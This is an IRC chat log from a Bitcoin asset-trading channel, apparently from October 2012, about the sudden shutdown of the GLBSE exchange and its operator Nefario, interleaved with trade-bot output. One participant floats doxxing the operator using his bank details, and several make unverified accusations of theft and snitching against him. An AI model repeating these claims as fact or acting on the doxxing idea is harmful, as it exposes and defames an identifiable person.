Oct 06 00:54:46 Well money is mostly safe outside GLBSE at least. Oct 06 00:54:47 not on my watch pal Oct 06 00:55:12 i would donate blood or semen for you, though Oct 06 00:55:14 rg: you probably can not even get it up any more... LOL! Oct 06 00:55:19 BTC-Mining: it sounds like you're saying, 'hey, I already have their money, lol' Oct 06 00:55:46 I'm saying it can't be stolen, even if it ends up being a hack. Oct 06 00:55:46 I guess all the bond issuers are ecstatic right now. No exchange, no obligations Oct 06 00:56:11 femtotube i guess it can be argfued. Oct 06 00:56:12 same for those shares in imaginary Co's Oct 06 00:56:58 Also there's supposed to be backup plans in place. Hopefully if Nefario is gone, which is purely speculative, the other owners of GLBSE can at least give us the info needed to pay out people. Oct 06 00:57:00 BTC-Mining: you might have a little problem with a lot of angry bond holders? Oct 06 00:57:03 do not start with this contract BS. Do you think they really give a shit? Oct 06 00:57:36 I agree with BTC-Mining anyway. Hopefully Nefario is gone. Oct 06 00:57:59 BTC-Mining: a plan? Those damn shareholders have no idea wtf is going on. There is no plan Oct 06 00:58:21 dub well yes, he does have a problem. actually all things considered i think he;'s pretty calm. Oct 06 00:58:33 They don't know what's going on, which does not mean they don't receive a daily backup or anything. Oct 06 00:58:53 Up until Nefario went silent that is. Oct 06 00:58:53 LOL Oct 06 00:58:53 BTC-Mining did you have a contingency plan for glbse going down ? Oct 06 00:59:04 mircea_popescu: yeah, as Iwas saying, issuers should be shitting brix Oct 06 00:59:50 No. What about MPEx? What do you have in place supposing you die tomorrow? Oct 06 01:00:22 BTC-Mining yes. Oct 06 01:00:29 it is in the faq, i'ts been pasted here yest Oct 06 01:00:32 im not pasting it daily. Oct 06 01:00:40 but more's the point : now you know how glbse shareholders feel Oct 06 01:00:46 exactly like you, they had no plans. Oct 06 01:01:46 Indeed. Oct 06 01:01:53 learning experience. Oct 06 01:02:32 But I've seen bigger things than GLBSE go down without notice without people going crazy over it within 24 hours. Oct 06 01:02:45 BTC-Mining the nerve is raw Oct 06 01:02:55 so many things went to shit past 3 months people are hysterical Oct 06 01:02:57 i can see why. Oct 06 01:03:27 The whole Bitcointalk community seems to be standing on the edge 24/7 since forever. Oct 06 01:03:36 well since late august. Oct 06 01:03:51 at least that's my impression. Oct 06 01:04:18 Eh, yeah... Pirate is one of the worst thing to have happened to Bitcoins. Oct 06 01:04:29 yes. and i do not mean his collapse. Oct 06 01:04:33 i mean his existence. Oct 06 01:05:11 Not to count the waves of bad amateur "ponzi" offers that appeared from new members right after the news headlines about Pirate. Oct 06 01:05:37 fact of the matter is, and we have to face this, the infrastructure was not ready. Oct 06 01:05:51 people thought (wrongly) glbse is good enough, and ppl thought (wrongly) nefario is good enough. Oct 06 01:06:08 they were good enough, for sums up to 100 btc and sunday casual mmorpg play. Oct 06 01:06:26 Because of 2 days offline? Oct 06 01:06:31 once things expanded a little the structural weakness collapsed. Oct 06 01:06:43 BTC-Mining no. because of 2 months of continuous bullshit by now. Oct 06 01:07:03 like allowing canadian ticket buying "mining operations". Oct 06 01:07:31 GLBSE was never a regulated market. Oct 06 01:08:46 At least it doesn't seem like Nefario wanted to approve some issuers as trustable and others as not trustable. He didn't want that responsibility I think. Oct 06 01:09:24 well... Oct 06 01:09:30 maybe if he stuck to that plan. Oct 06 01:10:40 Eh, the problem is that since it's centralized, he had the ability to intervene and people put pressure on him left and right and things started to change. Oct 06 01:10:58 Ideally we'd just have a peer to peer stock market that anyone can issue on. Oct 06 01:11:04 he.should.have.stuck.to.plan. Oct 06 01:11:15 this is the definition of safety in nucet : plan well, stick to plan. Oct 06 01:11:17 Probably, yes. Oct 06 01:11:27 he's not done the first, and then quit doing the 2nd. Oct 06 01:11:37 It would have been easier if he lived in China and not in the UK however. Oct 06 01:11:45 maybe. Oct 06 01:11:51 i dunno chinese legal system at all. Oct 06 01:12:23 Eh, me neither, but apparently, not as much as a lack of rule than those rules not being enforced. Oct 06 01:12:35 that's no solution then. Oct 06 01:12:47 [MPEX] [F.GIGA.ETF] 217 @ 0.00027772 = 0.0603 BTC [-] Oct 06 01:12:49 [MPEX] [F.GIGA.ETF] 2316 @ 0.00027772 = 0.6432 BTC [-] Oct 06 01:13:21 Well let's at least wait until Saturday and see if Nefario ran into legal trouble or the SEC wants to clawback ponzi earnings at the only place they can intervene (centralized system like GLBSE). Oct 06 01:14:01 Although those scenarios seems somewhat unlikely Oct 06 01:14:10 BTC-Mining if it helps you anything, i can offer you 100 btc's hedge on the later point. Oct 06 01:14:46 Not sure why I'd need a hedge on 2nd point Oct 06 01:15:11 kay. Oct 06 01:16:01 I never really invested in Pirate. Assuming that's what happens, I'd get funds frozen until accounting is figured out. Oct 06 01:18:45 Also, knowing how good Nefario is with PR, I wouldn't be surprised if he reappered soon after the silent week all surprised about seeing everyone in a panic and announcing he just completed rolling out GLBSE v3. He's so deep in his work sometimes he seems oblivious at what people would expect to be said upfront. Oct 06 01:19:12 That would probably be a mindblowing hit to his PR... Oct 06 01:19:41 If it was something completly benign and he simply felt too busy to announce it in details Oct 06 01:19:53 given the mood currently nobody'd even buy that. Oct 06 01:20:03 people'd prolly go on about how this is all a last minute cover-up Oct 06 01:33:00 Oct 01 01:47:42 Obsi ty, but it doesn't seem like anyone has a choice. glbse is going away. now's everyone's change to learn gpg. Oct 06 01:33:00 Oct 01 01:47:43 I don't think GLBSE is going to survive Oct 06 01:33:04 people sure do go on Oct 06 01:33:07 wow just 3 days ago. Oct 06 01:33:08 and on Oct 06 01:34:34 I find it hilarious Oct 06 01:37:30 Nefarious* Oct 06 01:37:47 This is the current effect on bitcointalk's community of recent events. Oct 06 01:38:04 [MPEX] [S.MPOE] 4017 @ 0.00037188 = 1.4938 BTC [+] Oct 06 01:38:06 [MPEX] [S.MPOE] 25702 @ 0.00037224 = 9.5673 BTC [+] Oct 06 01:38:06 [MPEX] [S.MPOE] 27481 @ 0.00037338 = 10.2609 BTC [+] Oct 06 01:38:29 Because people are allergic to anything happening out of the daily routine by now. Oct 06 01:40:19 true. Oct 06 01:44:09 ;;bc,24hprc Oct 06 01:44:09 12.68 Oct 06 01:44:12 ;;ticker Oct 06 01:44:13 Best bid: 12.82, Best ask: 12.84796, Bid-ask spread: 0.02796, Last trade: 12.84798, 24 hour volume: 29553, 24 hour low: 12.51, 24 hour high: 12.97 Oct 06 01:53:16 I'm surprised nothing's up on betsofbetco.in about the glbse situation. Oct 06 01:53:28 Ppl should be betting like mad over this. Oct 06 01:53:53 Because GLBSE is down so no bitcoins to vote? Oct 06 01:53:55 Maybe the site's just too slow. The last time I submitted a statement it took days to get approved and posted. Oct 06 01:53:57 lol Oct 06 01:55:07 http://trilema.com/2012/fact-of-the-matter-is-the-infrastructure-was-not-ready/ << if anyone cares, my latest blog post. Oct 06 01:55:49 If that's the case, most chances are that when you have a statement posted, it's already solved Oct 06 01:55:49 You sure are a fan of these Roman numeral-based lists, aren't you? Oct 06 01:56:08 This is bitcoinland, everything is thunderspeed Oct 06 01:56:27 Everything but the BoB staff. Oct 06 01:56:57 s/solved/screwed/ Oct 06 01:57:36 B0g4r7 i guess i am Oct 06 01:57:50 I would bet that glbse will not be back online and executing trades by the end of Oct. Oct 06 01:58:43 I won't put a satoshi against you Oct 06 01:59:10 In fact, my bid for glbse shares is lowering to 1 satoshi Oct 06 01:59:33 Fuck, I can't lower it anymore... :s Oct 06 02:00:05 A Satoshi is the smallest possible denomination of BTC? Oct 06 02:00:29 Bitcoin is broken, somebody fix it Oct 06 02:00:42 (I'm asking, I don't know) Oct 06 02:00:57 Yes, it is by now Oct 06 02:01:09 0.00000001BTC Oct 06 02:01:19 That's satoshi Oct 06 02:01:29 'k, thx. Oct 06 02:01:57 B0g4r7 yes Oct 06 02:03:06 [MPEX] [F.GIGA.ETF] 6200 @ 0.00027772 = 1.7219 BTC [-] Oct 06 02:04:42 [MPEX] [O.BTCUSD.C120T] 850 @ 0.21008905 = 178.5757 BTC [-] Oct 06 02:07:11 Who buys GIGA.ETF when GLBSE is down and GIGA.ETF won't upgrade to TERAMINING? Oct 06 02:07:48 I wouldn't even buy it for 0.00005 Oct 06 02:08:09 maybe they're banking on the theory that giga will have to be listed somewhere Oct 06 02:08:54 aye... but GIGA can't jsut resell the hardware once again on MPEx... or list for that matter. Oct 06 02:09:00 or honour GIGA.ETF Oct 06 02:09:16 who knows at this point Oct 06 02:09:32 coupla btc bets, might be anything Oct 06 02:09:33 The proof GIGA.ETF had rights to any proceeds is now offline. Oct 06 02:09:42 true. Oct 06 02:09:54 Even if he did such a thing as reissuing, GIGA.ETF would hold no value Oct 06 02:10:41 because why ? Oct 06 02:11:02 no proof would be left GIGA.ETF held anything? Oct 06 02:11:16 So only the new issue would hold any value. Oct 06 02:12:07 i think even if glbse never comes back we might be able to reconstruct some chain of ownership Oct 06 02:12:43 BTC-Mining: Do you want to short it? Oct 06 02:13:06 Short GIGA.ETF? Why not? Oct 06 02:13:27 so why aren;'t you ? Oct 06 02:13:41 I need shares to short it, don't I? Oct 06 02:13:56 Pretty much it. Oct 06 02:13:59 [MPEX] [F.GIGA.ETF] 13500 @ 0.00027771 = 3.7491 BTC [-] Oct 06 02:14:01 [MPEX] [F.GIGA.ETF] 15000 @ 0.00027771 = 4.1657 BTC [-] Oct 06 02:14:02 you can borrow, you're aware ? Oct 06 02:14:04 Mircea said it would not upgrade to TERAMINING in any case. Oct 06 02:14:17 Yes. I haven't really asked about that tho. Oct 06 02:14:23 i said there's not going to be any shareholders-pay upgrades Oct 06 02:15:07 Pretty much what I meant Oct 06 02:15:12 yea. Oct 06 02:15:49 BTC-Mining: i believe giga will pay mircea_popescu to pay coupons on GIGA.ETF Oct 06 02:16:21 i think you'll have a much harder time getting paid for your glbse GIGAs, although I believe he will honor those too Oct 06 02:16:44 im sure he'd honor anything once there's a list of shareholders and we can work out ownership Oct 06 02:17:39 but in the absolute-worst-case scenario, glbse is never heard from again, this will be a mess. Oct 06 02:17:47 Aye Oct 06 02:17:53 certainly Oct 06 02:18:20 i think actually it should be "illegal" to have an exchange w/o gpg from now on. Oct 06 02:18:29 i think one of glbse's partners has decided to make things difficult for him and the earliest maybe coins will begin to move is october 12th Oct 06 02:18:32 oh wait Oct 06 02:19:25 i mean... it's just asking for trouble. how do you delist ? how do you cover the endgame ? it's irresponsible. Oct 06 02:20:42 i think in the heat of the moment, nefario made a move to secure the usd backing of the coins when they were not returned and has made things much more difficult Oct 06 02:21:05 lol Oct 06 02:21:11 if you are looking to file suit against glbse you will not be eligble for repayment Oct 06 02:21:27 "eligibile". as if there's choice involved lol Oct 06 02:21:53 threats are taken serious by my internet lawyer. a few of you will find out just how serious i mean. Oct 06 02:23:43 Wait mircea, how much is MPEx valued at? Oct 06 02:25:20 !ticker s.mpoe Oct 06 02:25:22 [MPEX:S.MPOE] 1day: 0.00035988 / 0.00036937 / 0.00037408 (1787481 shares, 660.25 BTC), 30day: 0.00034 / 0.00038742 / 0.00042 (64897398 shares, 25,142.71 BTC) Oct 06 02:25:32 387`420 btc on 30day avg Oct 06 02:26:15 http://trilema.com/2012/mpoe-rezultate-septembrie-2012/ Oct 06 02:26:28 what about it pigeons ? Oct 06 02:26:32 the page was vandalized though there is a scary freak at the top Oct 06 02:26:39 lol Oct 06 02:26:43 oh i thought that could help him value mpex Oct 06 02:26:44 i change my header every quarter Oct 06 02:27:04 so my underwear is now pink :( Oct 06 02:28:13 Impressive, over 2400 BTC dividend eh Oct 06 02:28:29 actually it was 4800 btc but only 500mn shares are issued Oct 06 02:28:43 hmm, fancy Oct 06 02:28:44 (because of the way mpoe works with nonvoting stock you can never sell > 50% of any comp) Oct 06 02:28:57 it was an exceptionally good month tho Oct 06 02:29:17 Yes, it seems so. 1.2% returns. Oct 06 02:29:49 .py 4872.46491161 / 387420 Oct 06 02:29:50 0.0125766994776 Oct 06 02:29:57 o hey, 1.25 even. Oct 06 02:30:03 .py 0.0125766994776 ^^ 12 Oct 06 02:30:04 SyntaxError: invalid syntax (, line 1) Oct 06 02:30:08 .py 0.0125766994776 ** 12 Oct 06 02:30:09 1.56603044905e-23 Oct 06 02:30:14 gah Oct 06 02:30:16 .py 1.0125766994776 ** 12 Oct 06 02:30:17 1.16181011912 Oct 06 02:30:21 16% pa. Oct 06 02:30:27 ponzi! Oct 06 02:31:02 pigeons i was having fun with watching it in romanian leu right ? cause share price went up in btc, btc went up in usd, usd went up in ron Oct 06 02:31:14 so i went from like, 500k 7mn, 11.5mn, 16 mn etc Oct 06 02:31:40 Tell us how MPOE is different from GLBSE such that it is unlikely to suffer the same kind of problems. Oct 06 02:32:02 http://polimedia.us/bitcoin/faq.html#21 Oct 06 02:32:09 and read the next one too Oct 06 02:34:59 Yeah, but suppose you have a heart attack RIGHT NOW and can't actually do those actions, who will do them. Who else has access to MPEx? Oct 06 02:35:26 Specifically with regard to jurisdiction and regulatory intervention, are you located in a place that is less jackbooted than the UK? Oct 06 02:35:26 or anything which would unexpectedly render you unable to perform said actions. Oct 06 02:35:35 B0g4r7 romania Oct 06 02:35:37 He's in Romania... Oct 06 02:35:39 BTC-Mining my cto. Oct 06 02:35:46 Good to know Oct 06 02:35:58 (woman in whose name polimedia.us is registered) Oct 06 02:36:17 oh that's cute, you call it your cto Oct 06 02:36:24 well she is Oct 06 02:36:35 oh its a person nevermind Oct 06 02:36:44 has a romanian greencard and everything. Oct 06 02:37:03 (and no, no relation to mpoe-pr either) Oct 06 02:37:05 ok as long as -pr has no access to the site Oct 06 02:39:06 [MPEX] [F.GIGA.ETF] 200 @ 0.00027771 = 0.0555 BTC [-] Oct 06 02:48:02 [MPEX] [F.GIGA.ETF] 481 @ 0.0002777 = 0.1336 BTC [-] Oct 06 02:48:03 [MPEX] [F.GIGA.ETF] 3400 @ 0.00027769 = 0.9441 BTC [-] Oct 06 02:48:05 [MPEX] [F.GIGA.ETF] 8800 @ 0.00027768 = 2.4436 BTC [-] Oct 06 02:48:06 [MPEX] [F.GIGA.ETF] 10300 @ 0.00027766 = 2.8599 BTC [-] Oct 06 02:48:07 [MPEX] [F.GIGA.ETF] 6200 @ 0.00027761 = 1.7212 BTC [-] Oct 06 02:48:08 [MPEX] [F.GIGA.ETF] 10600 @ 0.00027715 = 2.9378 BTC [-] Oct 06 02:48:09 [MPEX] [F.GIGA.ETF] 13300 @ 0.00027144 = 3.6102 BTC [-] Oct 06 02:48:10 [MPEX] [F.GIGA.ETF] 10900 @ 0.0002561 = 2.7915 BTC [-] Oct 06 02:48:11 [MPEX] [F.GIGA.ETF] 464 @ 0.00023469 = 0.1089 BTC [-] Oct 06 02:48:40 that you BTC-Mining ? Oct 06 02:52:47 Unfortunately, no Oct 06 02:52:55 I wouldn't mind however Oct 06 03:02:56 GLBSE bet submitted. Now let's see how long it takes BoB to approve and post it. Oct 06 03:04:45 "For this statement to be false, on November 1 2012 at 12:00 AM UTC, the gblse.com website must be online and accessible to internet users, users must be able to log in, and users must be able to execute both buy and sell trades on the listed securities. At least 5 securities must be listed." Oct 06 03:08:32 ^^ interesting Oct 06 03:08:40 0_o Oct 06 03:11:15 jeez, 30 minutes per confirm :| Oct 06 03:13:11 [MPEX] [S.MPOE] 13200 @ 0.00037338 = 4.9286 BTC [+] Oct 06 03:13:33 LOL Oct 06 03:13:38 ;;bc,nethash Oct 06 03:13:38 20438.58573175134 Oct 06 03:14:25 midnightmagic: will you place a bet on that ? Oct 06 03:14:49 there are some weird bets at BoB -.- Oct 06 03:15:21 smickles: No, there are too many possible technicalities. Oct 06 03:15:53 For example, it completely leaves out all the pre-existing assets that users currently "own". Oct 06 03:16:39 So what happens if glbse just arbitrarily steals everyone's assets? I mean who wins the bet then? Oct 06 03:18:24 https://bitcointalk.org/index.php?topic=115669.0 Oct 06 03:18:29 wins the bet then? Oct 06 03:18:29 02:18 < BTC-Mining> https://bitcointalk.org/index.php?topic=115669.0 Oct 06 03:19:06 Seems like the bet is already won? I don't know. Oct 06 03:19:31 no shit, nefario is nefarious Oct 06 03:20:28 any you're a pumpkin Oct 06 03:20:31 :P Oct 06 03:23:06 whats new friends? Oct 06 03:24:05 https://bitcointalk.org/index.php?topic=115669.0 Oct 06 03:24:12 GLBSE closing down Oct 06 03:24:38 Well at least theymos claim Nefario has completly cut relations with other GLBSE owners Oct 06 03:25:15 you will claim your assets and run on mpex? Oct 06 03:25:26 Might do so, yes. Oct 06 03:25:28 Well that bet got moot fast. Oh well. Oct 06 03:25:41 mircea_popescu: congrats :P Oct 06 03:25:46 on ? Oct 06 03:25:54 GLBSE closing down? Oct 06 03:25:59 mircea_popescu: your competition dying a horrible death Oct 06 03:26:04 Look at the link. Oct 06 03:26:05 Maybe instead of everyone sharing one fate it would be better to put each asset-issuer on a separate server just for their assets and no one else's? Oct 06 03:26:21 copumpkin lol ty but... Oct 06 03:26:44 mircea_popescu: as an MPOE shareholder, I demand that you bring back the unicorn Oct 06 03:26:53 Mircea is not interested in what's being issued on GLBSE, except maybe a few things... Oct 06 03:27:01 like Gigavps Oct 06 03:27:10 well, Gigamining Oct 06 03:27:10 copumpkin lol Oct 06 03:27:15 BTC-Mining: doesn't matter, less competition is better for him Oct 06 03:27:22 how is less competition better ? Oct 06 03:27:35 i'd like to have SOME competition. what i don't like is people thinking glbse was competition Oct 06 03:27:50 who ever heard of nyse competing with magichipy.cn ? Oct 06 03:27:59 lol Oct 06 03:28:34 wow Oct 06 03:28:37 what in the actual fuck Oct 06 03:28:40 yeah i liked the unicorn too Oct 06 03:29:05 teek: you're surprised? Oct 06 03:29:08 at this point im guessing i will take deadterra off my ignore Oct 06 03:29:16 once he submits a gpg signed apology for his idiocy yest Oct 06 03:29:34 copumpkin: at how it is actually going down.. yeah i guess i am Oct 06 03:29:39 I've maintained that nefario is a bit of a clueless hack for months now Oct 06 03:29:47 but I'm a nice guy so I don't usually put it in those terms Oct 06 03:30:07 i thought he was a bit of a clueless hack, but this is harmful Oct 06 03:30:13 yeah Oct 06 03:30:43 This what I call Epic Fail. Oct 06 03:31:49 B0g4r7 B0g4r7_ BitcoinBaltar bitfoo bittenbit__ blakdawg bonks brbot BTC-Mining BTCHero BurtW Oct 06 03:33:05 Hey, plenty of madness over here in the forum Oct 06 03:33:24 At this rate, no single bitcoiner will be left trusting anything. Oct 06 03:33:44 woh Oct 06 03:33:49 i just saw this https://bitcointalk.org/index.php?topic=115669.0 Oct 06 03:34:03 yes, I just posted it everywhere... Oct 06 03:37:23 Withdrawals will require giving your identity Oct 06 03:37:57 I do believe that's a big fat Scammer tag I see headed Nefario's way. Oct 06 03:38:05 worse than scammer Oct 06 03:38:17 Betrayer, etc. Oct 06 03:38:19 he's shutting down, what does he need your ids for Oct 06 03:38:37 there is one reason. not like it wasn't likely this would happen. Oct 06 03:38:49 Because he's flipped and is working for those who pwned him, perhaps. Oct 06 03:38:57 FSA might have put it's nose in the case... Oct 06 03:38:58 [MPEX] [S.MPOE] 3519 @ 0.00037338 = 1.3139 BTC [+] Oct 06 03:38:59 [MPEX] [S.MPOE] 39881 @ 0.00037384 = 14.9091 BTC [+] Oct 06 03:39:06 After the SEC got interested in it. Oct 06 03:39:08 so, what's this community think of 'snitches', as nef is likely one Oct 06 03:39:29 I think he deserves the cold shoulder or worse. Oct 06 03:40:01 So... how do I even contact Nefario? Oct 06 03:40:19 BTC-Mining: well, a few of us have his cell, if it's still active Oct 06 03:40:34 Nefario: You are obviously unqualified to be anywhere near a project of the complexity of an exchange, even for play money (which I suspect BTC are, for most of you here, at least judging on behavior records). Oct 06 03:40:38 anyone guess the date on that quote ? Oct 06 03:40:41 matthewh3 talked to him on the cell earlier today Oct 06 03:40:59 BTC-Mining don't shittalk. mpex was fine all along, and is fine to this day. Oct 06 03:40:59 no one likes a gloater mircea_popescu Oct 06 03:41:10 pigeons it's ok, i don;'t like people who are liked. Oct 06 03:41:25 so you love self? Oct 06 03:41:34 and urmom. Oct 06 03:41:40 NO U Oct 06 03:41:51 mircea, what? Oct 06 03:42:02 NO_OOh: nefario! Oct 06 03:42:10 When did I ever say MPEx was not fine? Oct 06 03:42:12 BTC-Mining At this rate, no single bitcoiner will be left trusting anything. << Oct 06 03:42:25 NO_OOh: rough few days, eh? Oct 06 03:42:28 i trust Luke-Jr Oct 06 03:42:35 actually i trust luke to Oct 06 03:42:39 oh... barring some exceptions. I mean, bitcoiners tend to trust MtGox too. Oct 06 03:42:42 i trust him not to sell btc under 20 Oct 06 03:43:31 I turst him to turn his kids into serial killers Oct 06 03:43:42 i even believed nefario was a doctor Oct 06 03:43:45 smickles: what's the point of him snitching exactly though? Oct 06 03:43:51 to save his ass Oct 06 03:43:54 he hopes Oct 06 03:43:54 I mean, nefario is UK based right? Oct 06 03:43:59 Azelphur: avoid jail, lower fine Oct 06 03:44:06 yea, I mean I know that from his side Oct 06 03:44:13 but what are they even going to do to the investors? Oct 06 03:44:14 guys, he's here, just ask him Oct 06 03:44:25 good point :p Oct 06 03:44:28 nefario: any comments? Oct 06 03:44:35 I don't see him here Oct 06 03:44:41 I don't either Oct 06 03:44:45 unless my nicklist is bugged xD Oct 06 03:44:48 00:41 -!- NO_OOh [~james@cpc24-seve20-2-0-cust342.13-3.cable.virginmedia.com] has joined #bitcoin-assets Oct 06 03:44:49 is the NO_OOh him ? Oct 06 03:44:49 it is Oct 06 03:44:57 ah, fun Oct 06 03:44:59 No? Oct 06 03:45:08 not the ip he has been using Oct 06 03:45:12 he's been joining with retarded nicks lately Oct 06 03:45:12 NO_OOh: ? Oct 06 03:45:17 something about farting yesterday Oct 06 03:45:18 ahaha I AM NEFARIOS!!!! Oct 06 03:45:22 lol Oct 06 03:45:24 not just one Oct 06 03:45:25 lol nm Oct 06 03:45:26 but many nefarios Oct 06 03:45:26 it werked! Oct 06 03:45:32 xD Oct 06 03:45:43 aye, it's not Nefario Oct 06 03:46:02 If you're not Nef, why do you look like him? Oct 06 03:46:02 its no fun berating a wall Oct 06 03:46:08 smickles: I imagine if you get the who owns what shares info off them, we don't need GLBSE funds anyway Oct 06 03:46:12 i say it is him, let's get him! Oct 06 03:46:34 she's a witch! Oct 06 03:46:37 Nefario, do the right thing and return our asets without dragging us into your mess. Oct 06 03:46:46 rg: how you like him now Oct 06 03:46:47 Azelphur: there were only a few hundred satoshi on glbse anyway Oct 06 03:46:53 yea, I have a few BTC there Oct 06 03:46:58 nothing I can't afford to loose Oct 06 03:46:59 someon quote rg sucking his dick an hour ago Oct 06 03:47:07 for the lulz Oct 06 03:47:12 I have (well I guess had not) a non-trivial amount of BTC there. Oct 06 03:47:15 now Oct 06 03:47:17 the thing I'm curious about, say we give the nefario our info and he is snitching Oct 06 03:47:22 what are they going to arrest us for? Oct 06 03:47:27 [17:53] i have full confidence in nefario Oct 06 03:47:37 lol Oct 06 03:47:44 trading in a commodity? Oct 06 03:47:45 [17:52] nefario is going to sort everyhting out Oct 06 03:47:47 o.O Oct 06 03:47:59 rg: how about that backup of the db Oct 06 03:48:20 Unless Nefario encountered legal issues Oct 06 03:48:25 rg: give me a list of s²cm's shareholders and ssociated amounts Oct 06 03:48:32 smickles signed. Oct 06 03:48:35 *associated Oct 06 03:48:42 mircea_popescu: by who? rg? Oct 06 03:48:45 yea Oct 06 03:48:52 good point Oct 06 03:48:57 rg: what he said Oct 06 03:49:12 You need the latest one, not a backup. Also, who will give a code to each holder so they can claim the assets? Oct 06 03:49:23 codes don't work lol Oct 06 03:49:32 You'll only have alias + assets held Oct 06 03:49:42 BTC-Mining: i think the 'backup' rg has is the hd of the server Oct 06 03:49:49 and incidentally, the last backup available is the registry of record Oct 06 03:49:53 anyone trading past that point is sol. Oct 06 03:49:56 My deposit address could be my code. Oct 06 03:50:22 Since I already have that. Oct 06 03:51:32 erhm... people sometimes deposit from address they don't control Oct 06 03:51:36 [MPEX] [F.GIGA.ETF] 16400 @ 0.00021321 = 3.4966 BTC [-] Oct 06 03:51:36 [MPEX] [F.GIGA.ETF] 18800 @ 0.00021085 = 3.964 BTC [-] Oct 06 03:51:38 [MPEX] [F.GIGA.ETF] 10000 @ 0.00018002 = 1.8002 BTC [-] Oct 06 03:51:39 [MPEX] [F.GIGA.ETF] 4000 @ 0.00018001 = 0.72 BTC [-] Oct 06 03:51:40 [MPEX] [F.GIGA.ETF] 151188 @ 0.00018 = 27.2138 BTC [-] Oct 06 03:51:41 [MPEX] [F.GIGA.ETF] 16075 @ 0.00002002 = 0.3218 BTC [-] Oct 06 03:51:46 lol Oct 06 03:51:55 The address I sent my BTC to to deposit it into glbse. Oct 06 03:51:57 Gigamining not worth much anymore Oct 06 03:52:56 [MPEX] [F.GIGA.ETF] 186388 @ 0.00002002 = 3.7315 BTC [-] Oct 06 03:53:03 I'm creating the future of bitcoin! Oct 06 03:54:18 mircea_popescu: do you think this will affect the btcusd exchange rate? Oct 06 03:54:38 heh, maybe that short was nef Oct 06 03:54:49 ;D Oct 06 03:54:51 dub: I'm creating the future of bitcoin! <-- Sad if true Oct 06 03:55:20 ;;rated nefario Oct 06 03:55:20 You have not yet rated user nefario Oct 06 03:55:27 :) Oct 06 03:55:39 I wonder if nefario is planning on posting an update today Oct 06 03:55:54 Maybe... who knows Oct 06 03:56:02 Glad nobody took my bid of 1 satoshi for glbse shares Oct 06 03:56:03 according to theymos, he kind of cut the bridges Oct 06 03:56:14 I'm better of with my satoshis Oct 06 03:56:32 ;;rate nefario -1 seems to have broken contracts and screwed over many people for his own ass Oct 06 03:56:32 Error: For identification purposes, you must be identified via GPG to use the rating system. Oct 06 03:56:38 grr Oct 06 03:57:25 ;;rate nefario -1 seems to have broken contracts and screwed over many people for his own ass Oct 06 03:57:26 Rating entry successful. Your rating of -1 for user nefario has been recorded. Oct 06 03:57:31 if it comes to it, I have a real name along with bank account # and sort code for nefario. Oct 06 03:57:39 I'm sure we could dox him with that :P Oct 06 03:57:55 lets hope that it doesn't and he resolves this by not scamming everybody though Oct 06 03:58:10 um he did scam everybody Oct 06 03:58:23 he won't give back your stuff without giving your id to bad guys Oct 06 03:58:25 well, by that I mean I get my money back :p Oct 06 03:58:47 most of my information is actually publicly available anyway lol Oct 06 03:58:48 He scammed me, unless he changes his position. Oct 06 03:58:52 so it depends on what info he actually wants Oct 06 03:59:01 yea Oct 06 03:59:07 oh which unregistered securities you bought and for how much is public? Oct 06 03:59:11 I mean the other thing to note is that this is posted by theymos, theymos isn't nefario Oct 06 03:59:30 that is true. i would like to hear nefario's side, but i haven't Oct 06 03:59:33 pigeons: yep, I've pretty much said I made a transaction every time I did in here, rofl Oct 06 03:59:34 Yes, I'm gonna wait for word straight from the horse's mouth, as it were. Oct 06 03:59:42 and my real info is findable super easy given my nickname Oct 06 03:59:59 everybody knows I own a boatload of S2CM, et Oct 06 04:00:00 c Oct 06 04:01:00 I don't care how public or not my info is. Imposing this kind of requirement without full disclosure prior to taking my money is unacceptable. Oct 06 04:01:43 Aye, but who knows if Nefario even has a choice? Oct 06 04:02:00 Why would he not have a choice? Oct 06 04:02:01 he has a choice Oct 06 04:02:16 he knew this was a likely outcome when he started the exchange Oct 06 04:02:21 The way theymos talks about it, it seems Nefario is under legal trouble. Oct 06 04:02:30 if he wasn't prepared to not fuck people he shouldn't have gone this far Oct 06 04:02:51 I don't care what his situation is. What he is imposing on me is wrong. Oct 06 04:03:14 Well for one, showing himself for the world to see as the manager of GLBSE during the bitcoin conference... Oct 06 04:03:25 kind of an "instant target" move Oct 06 04:04:12 I myself was in a similar situation once, where I was facing criminal legal action, with the prosecutor talking about multiple years in prison, and that I could save my ass by ratting ppl out. Oct 06 04:04:18 Did I rat anyone out? No, I did not. Oct 06 04:04:42 B0g4r7 when people aren't just pixels on the screen things work differently it seems Oct 06 04:05:09 He is also illegally using user deposits to pay for his lawyer. Oct 06 04:05:10 dun dun dun Oct 06 04:05:14 how about that! Oct 06 04:05:36 so that, if true, makes him a thief Oct 06 04:05:45 That is theymos' claim Oct 06 04:05:53 Might well be true. Oct 06 04:05:57 right. and theymos has the perfect reason to lie : Oct 06 04:05:59 very quick to make tenuous and unsubstantiated claims Oct 06 04:06:33 B0g4r7 but as I keep saying, I don't think there is any 'ratting out' going on here, we havn't committed any crimes Oct 06 04:06:57 Then you tell me wtf this "identity" business is all about. Oct 06 04:07:00 he may have violated some financial regs, but this isn't exactly a big drug bust Oct 06 04:07:09 there is ratting out going on and you have committed what they consider "crimes" Oct 06 04:07:11 bitcoin isn't a currency, it's a digital asset -- like a dress in second life Oct 06 04:07:27 :P Oct 06 04:07:41 send me your digital clothings pls Oct 06 04:07:41 and ratting you out over something minor is no less shitty than ratting you out over something major Oct 06 04:07:42 I think it's likely that nefario is simply being forced to follow financial regulations Oct 06 04:07:52 which means, he needs that information in order to do so Oct 06 04:07:59 he's shutting down Oct 06 04:08:10 yea, he needs that information in order to legally shut down Oct 06 04:08:14 you are so deluded Oct 06 04:08:39 pigeons: I keep asking this, 4th time now, and nobody has replied Oct 06 04:08:44 say he does rat us out, what's going to happen? Oct 06 04:08:44 Well, fuck you Nefario. I hope you're happy with the monies you stole from me. Oct 06 04:09:09 to you, likely nothing Oct 06 04:09:15 what about to guys like giga? Oct 06 04:09:35 pigeons i guess guys like giga are royally fucked. Oct 06 04:10:16 Then you tell me wtf this "identity" business is all about. << nefario noticed it "worked" for pirate Oct 06 04:10:19 so why not use it ? Oct 06 04:10:50 I don't know the whole pirate story. What do you mean it worked for pirate? Oct 06 04:11:06 B0g4r7 he claimed that shit, bought him a few extra weeks of confusion Oct 06 04:11:11 oh Oct 06 04:11:21 I think from now on if we want to do securities we should make it decentralised xD Oct 06 04:11:27 ^ Oct 06 04:11:33 perhaps even a blockchain fork for it Oct 06 04:11:37 #opentransactions Oct 06 04:11:48 DECENTRALIZE ALL THE TARGETS Oct 06 04:11:49 haha blockchain fork for my foot, gtfo Oct 06 04:11:50 any 